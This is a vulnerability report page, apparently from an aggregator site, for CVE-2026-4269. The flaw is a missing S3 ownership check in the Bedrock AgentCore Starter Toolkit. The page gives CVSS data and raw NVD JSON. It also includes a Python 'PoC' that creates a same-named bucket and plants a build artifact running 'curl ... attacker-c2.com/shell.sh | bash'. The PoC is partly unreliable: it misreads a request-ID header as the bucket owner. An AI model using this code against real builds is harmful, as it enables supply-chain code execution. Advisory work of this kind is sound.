Security Vulnerability Report
中文
CVE-2026-4269 CVSS 7.5 HIGH

CVE-2026-4269

Published: 2026-03-16 18:16:11
Last Modified: 2026-05-11 14:34:13
Source: ff89ba41-3aa1-4d27-914a-91399e9639e5

Description

A missing S3 ownership verification in the Bedrock AgentCore Starter Toolkit before version v0.1.13 may allow a remote actor to inject code during the build process, leading to code execution in the AgentCore Runtime. This issue only affects users of the Bedrock AgentCore Starter Toolkit before version v0.1.13 who build or have built the Toolkit after September 24, 2025. Any users on a version >=v0.1.13, and any users on previous versions who built the toolkit before September 24, 2025 are not affected. To remediate this issue, customers should upgrade to version v0.1.13.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:amazon:bedrock_agentcore_starter_toolkit:*:*:*:*:*:python:*:* - VULNERABLE
Bedrock AgentCore Starter Toolkit < v0.1.13 (仅限2025年9月24日之后构建的版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2026-4269 PoC - S3 Bucket Ownership Bypass # This PoC demonstrates the S3 ownership verification bypass import boto3 from botocore.config import Config import json def create_malicious_s3_bucket(target_bucket_name, attacker_aws_account): """ Attacker creates a bucket with the same name as the target to intercept build dependencies """ s3_client = boto3.client('s3', config=Config(signature_version='s3v4'), aws_access_key_id=attacker_aws_account['access_key'], aws_secret_access_key=attacker_aws_account['secret_key']) try: # Create bucket in attacker's account with target's bucket name # This works due to S3 global namespace s3_client.create_bucket(Bucket=target_bucket_name) # Upload malicious build artifact malicious_artifact = '''#!/bin/bash # Injected malicious code curl -s http://attacker-c2.com/shell.sh | bash ''' s3_client.put_object( Bucket=target_bucket_name, Key='dependencies/build-tool-1.0.0.tgz', Body=malicious_artifact, ContentType='application/gzip' ) return True except Exception as e: print(f"Bucket creation failed: {e}") return False def verify_exploitation(bucket_name): """ Verify if the malicious bucket was used in victim's build """ s3_client = boto3.client('s3') try: # Check if bucket exists with attacker's ownership response = s3_client.head_bucket(Bucket=bucket_name) print(f"Bucket owner: {response['ResponseMetadata']['HTTPHeaders'].get('x-amz-id-2')}") return True except Exception as e: return False if __name__ == "__main__": # Target bucket name used by victim's build process TARGET_BUCKET = "bedrock-agentcore-build-deps-prod" attacker_config = { 'access_key': 'AKIA_ATTACKER_KEY', 'secret_key': 'attacker_secret_key' } print("CVE-2026-4269 - S3 Ownership Verification Bypass PoC") print("=" * 60) if create_malicious_s3_bucket(TARGET_BUCKET, attacker_config): print(f"[+] Malicious bucket '{TARGET_BUCKET}' created successfully") print("[+] Waiting for victim to trigger build process...")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-4269", "sourceIdentifier": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "published": "2026-03-16T18:16:11.007", "lastModified": "2026-05-11T14:34:12.810", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A missing S3 ownership verification in the Bedrock AgentCore Starter Toolkit before version v0.1.13 may allow a remote actor to inject code during the build process, leading to code execution in the AgentCore Runtime. This issue only affects users of the Bedrock AgentCore Starter Toolkit before version v0.1.13 who build or have built the Toolkit after September 24, 2025. Any users on a version >=v0.1.13, and any users on previous versions who built the toolkit before September 24, 2025 are not affected.\n\nTo remediate this issue, customers should upgrade to version v0.1.13."}, {"lang": "es", "value": "Una verificación de propiedad de S3 faltante en el Kit de Inicio Bedrock AgentCore antes de la versión v0.1.13 puede permitir a un actor remoto inyectar código durante el proceso de compilación, lo que lleva a la ejecución de código en el tiempo de ejecución de AgentCore. Este problema solo afecta a los usuarios del Kit de Inicio Bedrock AgentCore antes de la versión v0.1.13 que compilan o han compilado el Kit después del 24 de septiembre de 2025. Cualquier usuario en una versión &gt;=v0.1.13, y cualquier usuario en versiones anteriores que compiló el kit antes del 24 de septiembre de 2025, no se ve afectado. Para remediar este problema, los clientes deben actualizar a la versión v0.1.13."}], "metrics": {"cvssMetricV40": [{"source": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "HIGH", "subIntegrityImpact": "HIGH", "subAvailabilityImpact": "HIGH", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.6, "impactScore": 5.9}]}, "weaknesses": [{"source": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-283"}, {"lang": "en", "value": "CWE-340"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:amazon:bedrock_agentcore_starter_toolkit:*:*:*:*:*:python:*:*", "versionEndExcluding": "0.1.13", "matchCriteriaId": "59D471CF-5B18-4CE5-851B-0487702B4D33"}]}]}], "references": [{"url": "https://aws.amazon.com/security/security-bulletins/2026-008-AWS/", "source": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "tags": ["Vendor Advisory"]}, {"url": "https://github.com/aws/bedrock-agentcore-starter-toolkit/releases/tag/v0.1.13", "source": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "tags": ["Release Notes"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.